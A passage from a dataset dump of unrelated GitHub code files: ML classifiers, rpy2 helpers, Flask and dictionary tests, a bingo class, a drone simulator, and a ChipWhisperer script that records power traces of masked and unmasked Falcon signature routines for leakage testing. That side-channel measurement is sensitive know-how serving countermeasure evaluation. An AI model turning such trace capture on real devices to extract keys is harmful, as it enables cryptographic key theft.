[2] * 1000 + [3] * 1000)\n >>> bayes = GaussianBayes().fit(X, y)\n >>> hy = bayes.predict(X)\n >>> bayes = GaussianBayes(naive=True).fit(X, y)\n >>> hy_naive = bayes.predict(X)\n \"\"\"\n def __init__(self, naive=False) -> None:\n self._naive = naive\n\n @property\n def naive(self):\n return self._naive\n \n @property\n def labels(self):\n return self._labels\n\n @labels.setter\n def labels(self, labels):\n self._labels = labels\n\n @property\n def prior(self):\n return self._prior\n\n @prior.setter\n def prior(self, y):\n labels, counts = np.unique(y, return_counts=True)\n prior = counts / counts.sum() \n self.labels = labels\n self._prior = np.log(prior)\n\n @property\n def likelihood(self):\n return self._likelihood\n\n @likelihood.setter\n def likelihood(self, D):\n X, y = D\n likelihood = []\n for k in self.labels:\n mask = y == k\n mu = np.mean(X[mask], axis=0)\n if self.naive:\n cov = np.var(X[mask], axis=0, ddof=1)\n else:\n cov = np.cov(X[mask], rowvar=False)\n _ = multivariate_normal(mean=mu, cov=cov, allow_singular=True)\n likelihood.append(_)\n self._likelihood = likelihood\n\n def fit(self, X, y):\n self.prior = y\n self.likelihood = (X, y)\n return self\n\n def predict_log_proba(self, X):\n log_likelihood = np.vstack([m.logpdf(X) for m in self.likelihood]).T\n prior = self.prior\n posterior = log_likelihood + prior\n evidence = np.atleast_2d(logsumexp(posterior, axis=1)).T\n return posterior - evidence\n\n def predict_proba(self, X):\n _ = self.predict_log_proba(X)\n return np.exp(_)\n\n def predict(self, X):\n hy = self.predict_log_proba(X)\n _ = np.argmax(hy, axis=1)\n return self.labels[_]","repo_name":"INGEOTEC/EvoMSA","sub_path":"EvoMSA/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":18413,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"37"} +{"seq_id":"8024857304","text":"from rpy2.rinterface._rinterface import RRuntimeError\nfrom rpy2.robjects.packages import importr, data\nfrom rpy2.robjects import Formula, r\nfrom rpy2.robjects import StrVector, Vector\nimport re\nfrom rpy2.robjects import pandas2ri\nfrom rpy2.robjects.pandas2ri import ri2py as r2p\nfrom rpy2.robjects.pandas2ri import py2ri as p2r\n\n\npandas2ri.activate()\n\nsource = r.source\n\nbase = importr('base')\nc = base.c\n\n\ndef formula(f_str, df=None, **variables):\n assert not (df is not None and variables)\n fm = Formula(f_str)\n env = fm.environment\n if df is not None:\n variables = {\n name: df[name]\n for name in re.split('\\W+', f_str)\n }\n for name, var in variables.items():\n if name not in f_str:\n raise ValueError(f'Variable {name} not used in {f_str}')\n env[name] = var\n return fm\n\n\nclass G:\n def __init__(self, plot):\n ggplot2 = importr(\"ggplot2\")\n self.plot = plot\n self.add = ggplot2._env['%+%']\n\n def __add__(self, other):\n return G(self.add(self.plot, other))\n\n\ndef data_frame_from_matrix(matrix):\n from pandas import DataFrame\n import numpy as np\n \n rows_names = list(matrix.names[0])\n columns_names = list(matrix.names[1])\n\n return DataFrame(\n data=np.array(matrix),\n columns=columns_names,\n index=rows_names\n )\n\nfrom rpy2.rinterface import RNULLType\n\ndef one_or_all(x):\n try:\n if len(x) == 1:\n return x[0]\n except TypeError:\n pass\n return x\n\n\ndef r_test(test_name):\n def run_r_test(x, y, **kwargs):\n if len(x) < 2 or len(y) < 2:\n return {'p.value': 1}\n from pandas import Series\n try:\n result = r[test_name](p2r(Series(x)), p2r(Series(y)), **kwargs)\n except RRuntimeError:\n print(x)\n print(y)\n print(kwargs)\n raise\n return {\n key: one_or_all(value)\n for key, value in result.items()\n }\n run_r_test.__name__ == test_name\n return run_r_test\n\nks_test = r_test('ks.test')\nwilcox_test = r_test('wilcox.test')\n\n\ndef r_ks_test(x, y, **kwargs):\n if len(x) < 2 or len(y) < 2:\n return {'p.value': 1}\n from pandas import Series\n try:\n result = r['ks.test'](p2r(Series(x)), p2r(Series(y)), **kwargs)\n except RRuntimeError:\n print(x)\n print(y)\n print(kwargs)\n raise\n return {\n key: one_or_all(value)\n for key, value in result.items()\n }\n","repo_name":"krassowski/drug-disease-profile-matching","sub_path":"helpers/r.py","file_name":"r.py","file_ext":"py","file_size_in_byte":2524,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"37"} +{"seq_id":"17450482900","text":"import chipwhisperer as cw\nimport os\nfrom chipwhisperer.capture.api.programmers import STM32FProgrammer\nimport time\nimport struct\nfrom random import SystemRandom\nimport json\nimport numpy as np\nfrom json import JSONEncoder\n\ntry:\n if not scope.connectStatus:\n scope.con()\nexcept NameError:\n scope = cw.scope()\n\nscope.default_setup()\n\ntry:\n target = cw.target(scope)\nexcept:\n print(\"INFO: Caught exception on reconnecting to target - attempting to reconnect to scope first.\")\n print(\"INFO: This is a work-around when USB has died without Python knowing. Ignore errors above this line.\")\n scope = cw.scope()\n target = cw.target(scope)\n\nprint(\"INFO: Found ChipWhisperer\")\n\nprogram = STM32FProgrammer\n\ndir = os.path.dirname(os.path.realpath(__file__))\nprogram_hex_path = os.path.join(dir, r\"main.hex\") #Update accordingly\n\ncw.program_target(scope, program, program_hex_path)\n\ncryptogen = SystemRandom()\n\ndef write_fpr(fpr):\n val_bytes = fpr.to_bytes(8, byteorder=\"little\", signed=False)\n data_arr = [len(val_bytes)] + list(val_bytes)\n data = bytearray(data_arr)\n\n target.write(data)\n\ndef write_float(f):\n val_bytes = bytearray(struct.pack(\"d\", f))\n data_arr = [len(val_bytes)] + list(val_bytes)\n data = bytearray(data_arr)\n\n target.write(data)\n\ndef calc_avg_trace(traces):\n avg_trace = []\n\n for i in range(len(traces[0])):\n avg = 0\n\n for j in range(len(traces)):\n avg += traces[j][i]\n\n avg = avg / len(traces)\n\n avg_trace.append(avg)\n\n return avg_trace\n\ndef do_write_test():\n for _ in range(10):\n test_val = 123456\n val_bytes = test_val.to_bytes(8, byteorder=\"little\", signed=False)\n data_arr = [len(val_bytes)] + list(val_bytes)\n data = bytearray(data_arr)\n\n target.write(data)\n\n time.sleep(1)\n\n returned_data = target.read()\n returned_bytes = bytearray(returned_data, \"latin1\")\n returned_val = int.from_bytes(returned_bytes, byteorder=\"little\", signed=False)\n\n print(returned_val)\n\nclass NumpyArrayEncoder(JSONEncoder):\n def default(self, obj):\n if isinstance(obj, np.ndarray):\n return obj.tolist()\n return JSONEncoder.default(self, obj)\n\ndef capture_trace(data):\n scope.arm()\n target.flush()\n\n target.write(data)\n\n while True:\n returned_data = target.read()\n returned_bytes = bytearray(returned_data, \"latin1\")\n\n if len(returned_bytes) != 0:\n print(\"Result:\", str(returned_bytes))\n\n ret = scope.capture()\n\n if ret:\n print(\"Error occured. Retrying\")\n return capture_trace(data)\n\n trace = scope.get_last_trace()\n return trace\n\n time.sleep(0.1)\n\ndef do_sign_test(cmd=16, filename=\"sign_tree\", iterations=1000):\n\n scope.clock.adc_src = \"clkgen_x4\"\n scope.adc.decimate = 2\n scope.adc.samples = 95000\n\n traces = {\n \"fix\": [],\n \"rand\": []\n }\n\n time.sleep(1)\n\n for i in range(iterations):\n print(\"Iteration:\", str(i))\n\n # Fixed key\n\n type = 0\n seed = os.urandom(8)\n salt = os.urandom(40)\n data_arr = [cmd] + [type] + [len(seed) + len(salt) + 1] + list(seed) + list(salt)\n data = bytearray(data_arr)\n\n fix_trace = capture_trace(data)\n traces[\"fix\"].append(fix_trace)\n\n # Random key\n type = 1\n seed = os.urandom(8)\n salt = os.urandom(40)\n data_arr = [cmd] + [type] + [len(seed) + len(salt) + 1] + list(seed) + list(salt)\n data = bytearray(data_arr)\n\n rand_trace = capture_trace(data)\n traces[\"rand\"].append(rand_trace)\n\n print(\"**********TEST DONE**********\")\n\n #Write traces to file\n with open(\"new_traces/\" + filename + \"_\" + str(iterations) + \".txt\", \"w\") as filehandle:\n json.dump(traces, filehandle, cls=NumpyArrayEncoder)\n\ndef do_fft_test(type=11, filename=\"fft\", iterations=1000, samples=30000):\n scope.clock.adc_src = \"clkgen_x4\"\n scope.adc.decimate = 2\n scope.adc.samples = samples\n\n traces = {\n \"fix\": [],\n \"rand\": []\n }\n\n offset = 0\n\n for i in range(iterations):\n print(\"Iteration:\", str(i))\n\n #Fixed test\n scope.arm()\n target.flush()\n\n data_arr = [type] + [2] + [0] + [offset]\n data = bytearray(data_arr)\n\n trace = capture_trace(data)\n traces[\"fix\"].append(trace)\n\n #Random test\n scope.arm()\n target.flush()\n\n data_arr = [type] + [2] + [1] + [offset]\n data = bytearray(data_arr)\n\n trace = capture_trace(data)\n traces[\"rand\"].append(trace)\n\n #Write traces to file\n with open(\"new_traces/\" + filename + \"_\" + str(iterations) + \".txt\", \"w\") as filehandle:\n json.dump(traces, filehandle, cls=NumpyArrayEncoder)\n\n print(\"**********TEST DONE**********\")\n\ndef do_sub_test(type=7, filename=\"secure_ursh\", iterations=1000):\n scope.clock.adc_src = \"clkgen_x4\"\n scope.adc.decimate = 2\n scope.adc.samples = 10000\n\n traces = {\n \"fix\": [],\n \"rand\": []\n }\n\n fix_a_val = float(68.20750458284908)\n fix_shift_val = 4\n\n for i in range(iterations):\n print(\"Iteration:\", str(i))\n\n #Fixed test\n fix_a_rand = float(cryptogen.random() * 256 - 128)\n fix_shift_rand = int(cryptogen.random() * 16)\n\n val_bytes = bytearray(struct.pack(\"2d\", fix_a_val, fix_a_rand))\n data_arr = [type] + [len(val_bytes) + 2] + list(val_bytes) + [fix_shift_val] + [fix_shift_rand]\n data = bytearray(data_arr)\n\n trace = capture_trace(data)\n traces[\"fix\"].append(trace)\n\n #Random test\n rand_a_val = float(cryptogen.random() * 256 - 128)\n rand_a_rand = float(cryptogen.random() * 256 - 128)\n\n rand_shift_val = int(cryptogen.random() * 16)\n rand_shift_rand = int(cryptogen.random() * 16)\n\n val_bytes = bytearray(struct.pack(\"2d\", rand_a_val, rand_a_rand))\n data_arr = [type] + [len(val_bytes) + 2] + list(val_bytes) + [rand_shift_val] + [rand_shift_rand]\n data = bytearray(data_arr)\n\n trace = capture_trace(data)\n traces[\"rand\"].append(trace)\n\n #Write traces to file\n with open(\"new_traces/\" + filename + \"_\" + str(iterations) + \".txt\", \"w\") as filehandle:\n json.dump(traces, filehandle, cls=NumpyArrayEncoder)\n\n print(\"**********TEST DONE**********\")\n\ndef do_simple_test(type, filename, iterations=1000):\n scope.clock.adc_src = \"clkgen_x4\"\n scope.adc.decimate = 2\n scope.adc.samples = 10000\n\n traces = {\n \"fix\": [],\n \"rand\": []\n }\n\n fix_a_val = float(68.20750458284908)\n fix_b_val = float(-92.93250079435525)\n\n for i in range(iterations):\n print(\"Iteration:\", str(i))\n\n #Fixed test\n fix_a_rand = float(cryptogen.random() * 256 - 128)\n fix_b_rand = float(cryptogen.random() * 256 - 128)\n\n val_bytes = bytearray(struct.pack(\"4d\", fix_a_val, fix_b_val, fix_a_rand, fix_b_rand))\n data_arr = [type] + [len(val_bytes)] + list(val_bytes)\n data = bytearray(data_arr)\n\n trace = capture_trace(data)\n traces[\"fix\"].append(trace)\n\n #Random test\n rand_a_val = float(cryptogen.random() * 256 - 128)\n rand_b_val = float(cryptogen.random() * 256 - 128)\n rand_a_rand = float(cryptogen.random() * 256 - 128)\n rand_b_rand = float(cryptogen.random() * 256 - 128)\n\n val_bytes = bytearray(struct.pack(\"4d\", rand_a_val, rand_b_val, rand_a_rand, rand_b_rand))\n data_arr = [type] + [len(val_bytes)] + list(val_bytes)\n data = bytearray(data_arr)\n\n trace = capture_trace(data)\n traces[\"rand\"].append(trace)\n\n #Write traces to file\n with open(\"new_traces/\" + filename + \"_\" + str(iterations) + \".txt\", \"w\") as filehandle:\n json.dump(traces, filehandle, cls=NumpyArrayEncoder)\n\n print(\"**********TEST DONE**********\")\n\ndef do_all_simple():\n print(\"STARTING ALL SIMPLE TESTS\")\n do_simple_test(1, \"fpr_add_traces\", 1000)\n time.sleep(10)\n do_simple_test(2, \"fpr_add_traces_masked\", 1000)\n time.sleep(10)\n do_simple_test(3, \"fpr_add_traces_masked_deep\", 1000)\n time.sleep(10)\n do_simple_test(4, \"fpr_mul_traces\", 1000)\n time.sleep(10)\n do_simple_test(5, \"fpr_mul_traces_masked\", 1000)\n time.sleep(10)\n do_simple_test(6, \"fpr_mul_traces_masked_deep\", 1000)\n time.sleep(10)\n do_simple_test(1, \"fpr_add_traces\", 10000)\n time.sleep(10)\n do_simple_test(2, \"fpr_add_traces_masked\", 10000)\n time.sleep(10)\n do_simple_test(3, \"fpr_add_traces_masked_deep\", 10000)\n time.sleep(10)\n do_simple_test(4, \"fpr_mul_traces\", 10000)\n time.sleep(10)\n do_simple_test(5, \"fpr_mul_traces_masked\", 10000)\n time.sleep(10)\n do_simple_test(6, \"fpr_mul_traces_masked_deep\", 10000)\n time.sleep(10)\n\ndef test_clock():\n scope.clock.adc_src = \"clkgen_x4\"\n time.sleep(1)\n freq = scope.clock.adc_freq\n print(\"Current frequency\", str(freq))\n srate = scope.clock.adc_rate\n print(\"Current sampling rate:\", str(srate))\n adc_src = scope.clock.adc_src\n print(\"Current adc src\", adc_src)\n\n# do_all_simple()\n# do_write_test()\n# do_fft_trace()\n# do_fpc_mul_masked_test()\n# do_fpr_mul_test()\n# do_fpr_mul_masked_test()\n# do_fpr_add_test()\n# do_sub_test(type=7, filename=\"ursh\", iterations=1000)\n# do_sub_test(type=8, filename=\"secure_ursh\", iterations=1000)\n# do_sub_test(type=9, filename=\"norm\", iterations=1000)\n# do_sub_test(type=10, filename=\"secure_norm\", iterations=1000)\n#\n# do_fft_test(type=11, filename=\"fft\", iterations=1000, samples=20000)\n# do_fft_test(type=12, filename=\"fft_masked\", iterations=1000, samples=30000)\n# do_fft_test(type=13, filename=\"fft_masked_deep\", iterations=1000, samples=95000)\n\n# test_clock()\n\n# do_simple_test(2, \"fpr_add_traces_slow_masked\", 1000)\n\n# do_fft_test(type=14, filename=\"poly_mul_fft\", iterations=1000, samples=20000)\n# do_fft_test(type=15, filename=\"poly_mul_fft_masked\", iterations=1000, samples=30000)\n# do_sign_test(cmd=16, filename=\"ffSamplingLOGN8\", iterations=1000)\n# do_sign_test(cmd=17, filename=\"ffSamplingLOGN8_masked\", iterations=1000)","repo_name":"Thomar10/Falcon-signature","sub_path":"chipwhisperer/trace.py","file_name":"trace.py","file_ext":"py","file_size_in_byte":10192,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"21641914305","text":"from flask import Flask, render_template\napp = Flask(__name__)\n\n\n@app.route('/user/')\ndef index(username):\n users = {\n \"quan\" : {\n \"name\": \"Nguyen Anh Quan\",\n \"age\": 16,\n \"gender\": \"male\"\n },\n \"tuananh\" : { \n \"name\": \"Huynh Tuan Anh\",\n \"age\": 23,\n \"gender\": \"male\"\n\n },\n \"hathu\": {\n \"name\": \"Nguyen Ha Thu\",\n \"age\": 16,\n \"gender\": \"female\"\n }\n }\n if username in users.keys():\n boo = True\n else:\n boo = False\n \n\n return render_template('ex2.html', alluser = users, username = username, boo = boo)\n\nif __name__ == '__main__':\n app.run(debug=True)\n ","repo_name":"hathu0610/nguyenhathu-fundamental-c4e13","sub_path":"Web01/HW/Serious/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13649698411","text":"\"\"\"\nTesting cases of method and function of DICTIONARY\n\"\"\"\n\nimport random\nfrom libs.create_dict import create_random_dict\nfrom libs.create_set import create_random_set\n\n# =============================================================================\n\n\ndef test_dict_clear():\n \"\"\"\n Test dict_clear():\n - dict == {}\n \"\"\"\n num_test = 10\n\n for _ in range(num_test):\n sample_dict = create_random_dict()\n\n sample_dict.clear()\n\n assert len(sample_dict) == 0\n\n\n# =============================================================================\n\n\ndef test_dict_copy():\n \"\"\"\n Test dict.copy():\n - dict_copy == dict.copy()\n - dict_copy is not dict\n \"\"\"\n num_test = 10\n\n for _ in range(num_test):\n sample_dict = create_random_dict()\n\n dict_copy = sample_dict.copy()\n\n assert sample_dict == dict_copy\n assert sample_dict is not dict_copy\n\n\n# =============================================================================\n\n\ndef test_dict_fromkeys():\n \"\"\"\n Test dict.fromkeys(key, value):\n - new_dict == {key_0: value, key_1: value, ...}\n \"\"\"\n num_test = 10\n lower, upper = 0, 1000\n\n for _ in range(num_test):\n keys_dict = create_random_set()\n value = random.randint(lower, upper)\n\n sample_dict = dict.fromkeys(keys_dict, value)\n\n test_val = True\n for k in sample_dict:\n if sample_dict[k] != value:\n test_val = False\n break\n\n assert len(sample_dict) == len(keys_dict)\n assert test_val\n\n\n# =============================================================================\n\n\ndef test_dict_get():\n \"\"\"\n Test dict.get(key, value):\n - key in dict: dict.get(key, value) == dict[key]\n - key not in dict: dict.get(key, value) == value\n \"\"\"\n num_test = 10\n lower, upper = 0, 1000\n\n for _ in range(num_test):\n sample_dict = create_random_dict()\n\n key = random.randint(lower, upper)\n value = random.randint(lower, upper)\n\n if key in sample_dict:\n assert sample_dict.get(key, value) == sample_dict[key]\n else:\n assert value == sample_dict.get(key, value)\n\n\n# =============================================================================\n\n\ndef test_dict_items():\n \"\"\"\n Test dict.items():\n - dict_items([(key_0, value_0), (key_1, value_1), ...]) == dict.items()\n \"\"\"\n num_test = 10\n\n for _ in range(num_test):\n sample_dict = create_random_dict()\n\n list_elements = list(sample_dict.items())\n\n test_val = True\n idx = 0\n for k in sample_dict:\n if k != list_elements[idx][0] or sample_dict[k] != list_elements[idx][1]:\n test_val = False\n break\n idx += 1\n\n assert len(list_elements) == len(sample_dict)\n assert test_val\n\n\n# =============================================================================\n\n\ndef test_dict_keys():\n \"\"\"\n Test dict.keys():\n - list(dict.keys()) == list(dict)\n \"\"\"\n num_test = 10\n\n for _ in range(num_test):\n sample_dict = create_random_dict()\n\n assert list(sample_dict.keys()) == list(sample_dict)\n\n\n# =============================================================================\n\n\ndef test_dict_pop():\n \"\"\"\n Test dict.pop(key):\n - old_dict[key] == dict.pop(key)\n - key not in new_dict\n - new_len == old_len - 1\n \"\"\"\n num_test = 10\n\n for _ in range(num_test):\n sample_dict = create_random_dict()\n old_len = len(sample_dict)\n\n key = random.choice(list(sample_dict))\n value_test = sample_dict[key]\n\n value_returned = sample_dict.pop(key)\n\n assert len(sample_dict) == old_len - 1\n assert key not in sample_dict\n assert value_returned == value_test\n\n\n# =============================================================================\n\n\ndef test_dict_popitem():\n \"\"\"\n Test dict.popitem():\n - new_len = old_len - 1\n - key_end not in new dict\n - (key_end, value_end) of old dict == dict.popitem()\n \"\"\"\n num_test = 10\n\n for _ in range(num_test):\n sample_dict = create_random_dict()\n old_len = len(sample_dict)\n\n end_key = list(sample_dict)[-1]\n end_value = sample_dict[end_key]\n\n returned_element = sample_dict.popitem()\n\n assert len(sample_dict) == old_len - 1\n assert end_key == returned_element[0] and end_value == returned_element[1]\n assert end_key not in sample_dict\n\n\n# =============================================================================\n\n\ndef test_dict_setdefault():\n \"\"\"\n Test dict.setdefault(key, value):\n - key in dict: dict[value] == dict.setdefault(key, value)\n - key not in dict: value == dict.setdefault(key, value)\n key in new dict\n new_len == old_len + 1\n \"\"\"\n num_test = 10\n lower, upper = 0, 1000\n\n for _ in range(num_test):\n sample_dict = create_random_dict()\n old_len = len(sample_dict)\n\n key = random.randint(lower, upper)\n if key in sample_dict:\n assert sample_dict[key] == sample_dict.setdefault(key)\n else:\n value_returned = sample_dict.setdefault(key, random.randint(lower, upper))\n\n assert key in sample_dict\n assert len(sample_dict) == old_len + 1\n assert sample_dict[key] == value_returned\n\n\n# =============================================================================\n\n\ndef test_dict_update():\n \"\"\"\n Test dict_1.update(dict_2):\n - {keys: values of keys} of dict_2 in dict_1\n \"\"\"\n num_test = 10\n\n for _ in range(num_test):\n sample_dict_1 = create_random_dict()\n sample_dict_2 = create_random_dict()\n\n sample_dict_1.update(sample_dict_2)\n\n test_val = True\n for k in sample_dict_2:\n if k not in sample_dict_1 or sample_dict_2[k] != sample_dict_1[k]:\n test_val = False\n break\n\n assert test_val\n\n\n# =============================================================================\n\n\ndef test_dict_values():\n \"\"\"\n Test dict.values():\n - dict_values([value_0, value_1, ...]) == dict.values()\n \"\"\"\n num_test = 10\n\n for _ in range(num_test):\n sample_dict = create_random_dict()\n\n list_values = list(sample_dict.values())\n\n test_val = True\n idx = 0\n for k in sample_dict:\n if sample_dict[k] != list_values[idx]:\n test_val = False\n break\n idx += 1\n\n assert len(list_values) == len(sample_dict)\n assert test_val\n","repo_name":"NguyenTranMLAI/WinterIntern","sub_path":"CODE/Week01/Python/tests/test_dictionary_libs.py","file_name":"test_dictionary_libs.py","file_ext":"py","file_size_in_byte":6760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72650665706","text":"def solution(numbers):\n answer = ''\n number = [str(i) for i in numbers]\n\n number.sort(key=lambda x : x * 3, reverse=True)\n\n for i in number:\n answer += i\n\n if len(answer) >= 2 and answer[0] == '0' and answer[1] == '0':\n return '0'\n\n return answer","repo_name":"KyubinHwang/preparing_Algorithm","sub_path":"algorithm_2022_summer_To_Fall/프로그래머스/가장 큰 수.py","file_name":"가장 큰 수.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74744813226","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import classification_report\nimport pickle\n\n\ndef GridSearchRF(X_train,y_train):\n from sklearn.model_selection import GridSearchCV\n from sklearn.ensemble import RandomForestClassifier\n # use a full grid over all parameters\n param_grid = {\"max_depth\": [4,5,7, None],\n \"n_estimators\":[100,200,300,400,500],\n \"max_features\": [1, 3, 10],\n \"min_samples_split\": [2, 3, 10],\n \"min_samples_leaf\": [1, 3, 10],\n \"bootstrap\": [True, False]}\n #\"criterion\": [\"gini\", \"entropy\"]}\n\n forest_grid = GridSearchCV(estimator=RandomForestClassifier(random_state=0),\n param_grid = param_grid,\n # criterion='gini',\n scoring=\"accuracy\", #metrics\n cv = 3, #cross-validation\n n_jobs = -1) #number of core\n\n forest_grid.fit(X_train,y_train) #fit\n\n forest_grid_best = forest_grid.best_estimator_ #best estimator\n print(\"Best Model Parameter: \",forest_grid.best_params_)\n\n\n\ndf = pd.read_csv(r\"path.csv\", header=0,index_col=0,parse_dates=True)\n\nX_train, X_test, y_train, y_test = train_test_split(df[df.columns[df.columns != 'target']], df.target, test_size=0.2,shuffle=False)\n\nprint('train size:', X_train.shape[0])\nprint('test size:', X_test.shape[0])\nprint('train data:', X_train)\nprint('train target:', y_train)\n\n\n#GridSearchRF(X_train,y_train)\n\n#モデルの訓練\nmodel = RandomForestClassifier(n_estimators=200,random_state=0, n_jobs=-1)\nmodel.fit(X_train, y_train)\n\n#モデルの保存\npickle.dump(model, open( r'finalized_model.sav', 'wb'))\n\n#モデルの学習結果\nprint(classification_report(y_test,model.predict(X_test)))\n\ntest_x = X_train.iloc[[10]]\nprint(model.predict(test_x))\nprint(model.predict_proba(test_x))\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n#特徴量の重要度\nfeature = model.feature_importances_\n#特徴量の重要度順(降順)\nindices = np.argsort(feature)[::-1]\n#特徴量の名前\nlabel = df.columns[0:]\n\nplt.title('Feature Importance')\nplt.bar(range(len(feature)),feature[indices], color='lightblue', align='center')\nplt.xticks(range(len(feature)), label[indices], rotation=90)\nplt.xlim([-1, len(feature)])\nplt.tight_layout()\nplt.show()","repo_name":"Speculatorintokyo/FX-Machine-learning","sub_path":"RandomForestsample.py","file_name":"RandomForestsample.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"71071776746","text":"class Bingo:\n\n def __init__(self, size: int):\n self.size = size\n self.card = []*size\n self.has_bingo = False\n\n self.mask = []\n # Old: self.mask = [[0]*size]*size\n # To prevent same reference memory problem\n # TODO: find better work around\n for index_y in range(self.size):\n mask_row = []\n for index_x in range(self.size):\n mask_row.append(0)\n self.mask.append(mask_row)\n\n def print_card(self) -> None:\n print(self.card)\n\n def print_mask(self) -> None:\n print(self.mask)\n\n def add_row(self, row: list) -> None:\n new_row = []\n for number in row:\n new_row.append(int(number))\n row = new_row\n\n row_added = False\n for row_index in range(self.size):\n if not self.card[row_index]:\n self.card[row_index] = row\n row_added = True\n break\n\n if not row_added:\n print(f\"Row not added: {row}\")\n\n def has_number(self, number: int) -> None:\n number = int(number)\n\n has_bingo = False\n for row_index in range(self.size):\n for column_index in range(self.size):\n if self.card[row_index][column_index] == number:\n self.mask[row_index][column_index] = 1\n\n if self.row_has_bingo(row_index) or self.column_has_bingo(column_index):\n has_bingo = True\n\n if has_bingo:\n self.has_bingo = True\n print(\"bingo!\")\n self.print_card()\n self.print_mask()\n\n def row_has_bingo(self, row_index: int) -> bool:\n if sum(self.mask[row_index]) == self.size:\n return True\n else:\n return False\n\n def column_has_bingo(self, column_index: int) -> bool:\n column_masks = []\n for row_index in range(self.size):\n column_masks.append(self.mask[row_index][column_index])\n\n if sum(column_masks) == self.size:\n return True\n else:\n return False\n\n def row_sum(self, row_index: int) -> int:\n return sum(self.card[row_index])\n\n def column_sum(self, column_index: int) -> int:\n column_numbers = []\n for row_index in range(self.size):\n column_numbers.append(self.card[row_index][column_index])\n\n return sum(column_numbers)\n\n def winning_sums(self) -> dict:\n winnings_sums = {}\n for index in range(self.size):\n if self.row_has_bingo(index):\n winning_sum = self.row_sum(index)\n winnings_sums.update({f\"row_{index}\": winning_sum})\n if self.column_has_bingo(index):\n winning_sum = self.column_sum(index)\n winnings_sums.update({f\"column_{index}\": winning_sum})\n return winnings_sums\n\n def sum_unmarked(self) -> int:\n counter = 0\n for row_index in range(self.size):\n for column_index in range(self.size):\n if self.mask[row_index][column_index] == 0:\n counter += self.card[row_index][column_index]\n return counter\n\n\nif __name__ == '__main__':\n card = Bingo(9)\n","repo_name":"bverpaalen/AoC2021","sub_path":"days/day_4/bingo_card.py","file_name":"bingo_card.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3316410429","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\nclass Drone:\n class Mode:\n def __init__(self, previous='FreeFly', actual='FreeFly',\n parameters_destination=np.array([]), parameters_detection=0):\n \"\"\"\n % mode:\n % Off --> The drone is off\n % Disarm --> The drone is disarmed\n % Arm --> The drone is armed but not flying\n % FreeFly --> the drone is flying\n % Others, to be built\n \"\"\"\n self.previous = previous\n self.actual = actual\n self.parameters_destination = np.array(parameters_destination)\n self.parameters_detection = parameters_detection\n\n def __init__(self, placed_pattern=0, dowmsampling=6, index=0, status_net=True, mode=Mode(),\n home=np.array([]), mission_strat_position=np.array([]), orientation=0,\n speed=0.0, vision=np.array([]), vision_on=True, corners=np.array([]),\n radius_vision=0.0, angular_vision=0.0,\n std_drone_speed=0.0, std_drone_direction=0.0, std_drone_orientation=0.0,\n p_disconnection=0.0, p_misdetection=0.05, p_package_lost=0.05, p_camera_off=0.0):\n \"\"\"\n index: drone's index\n status_net: True --> active to the net, False --> not active to the net\n mode: same in the mode class\n home: [x,y] (pixel) Home position (for Return to Launch option)\n position: [x,y] (pixel)\n orientation: Degrees respect to North (clock-wise). 0: North, 90: East, 180: South, 270: West\n speed: magnitude of speed (pixels/s) v_x = speed*cosd(orientation-90), v_y = speed*sind(orientation-90)\n vision:\n vision_on: Set the camera on at the beginning\n distance: Array of distances [Bottom, Right, Top, Left ]\n \"\"\"\n self.index = index\n self.status_net = status_net\n self.mode = mode\n self.corners = corners\n # Slope of the boundaries\n self.m1 = (self.corners[1][1] - self.corners[1][0]) / (self.corners[0][1] - self.corners[0][0]) # Bottom\n self.m2 = (self.corners[1][1] - self.corners[1][2]) / (self.corners[0][1] - self.corners[0][2]) # Right\n self.m3 = (self.corners[1][3] - self.corners[1][2]) / (self.corners[0][3] - self.corners[0][2]) # Top\n self.m4 = (self.corners[1][3] - self.corners[1][0]) / (self.corners[0][3] - self.corners[0][0]) # Left\n self.k_array = [self.m1, self.m2, self.m3, self.m4]\n if len(home) == 0:\n self.home_position(placed_pattern, dowmsampling)\n else:\n self.home = np.array(home[index])\n self.mission_strat_position = mission_strat_position\n self.position = self.home\n self.direction = orientation\n self.orientation = orientation\n self.speed = speed\n self.vision = np.array(vision)\n self.vision_on = vision_on\n\n self.radius_vision = radius_vision # Radius for vision (pixels)\n self.angular_vision = angular_vision # Degrees of vision (<180)\n self.std_drone_speed = std_drone_speed # Standard deviation for the speed of the drone\n self.std_drone_direction = std_drone_direction # Standard deviation for the direction of the drone\n self.std_drone_orientation = std_drone_orientation # Standard deviation for the orientation of the drone\n\n\n # Probability parameters\n self.p_disconnection = p_disconnection # Probability the drone disconnects the net\n self.p_misdetection = p_misdetection # Probability of not identifying a person when a person is on range\n self.p_package_lost = p_package_lost # Probability of lossing a package of information among the drones\n self.p_camera_off = p_camera_off # Probability of turning off the camera and not searching\n self.distance = np.array([])\n self.get_distance()\n\n # General parameters\n self.downsampling = dowmsampling\n if mode.actual is 'Raster_motion':\n self.is_mission_start = False\n self.total_raster_step = round(\n self.radius_vision * np.sin(np.deg2rad(self.angular_vision) / 2) / self.speed)\n self.current_raster_step = 0\n self.is_init = True\n self.is_right = False\n self.is_left = False\n self.up_angle = 190\n\n def home_position(self, placed_pattern, downsampling):\n \"\"\"\n Home position for the drone\n :param placed_pattern:\n 0 --> Random position within the cage\n 1 --> Distributed over one edge\n 2 --> Distributed over all edges\n 3 --> Starting from one corner\n 4 --> Starting from all corner\n :param downsampling: down-sampling value for home margin\n :return self.home : home 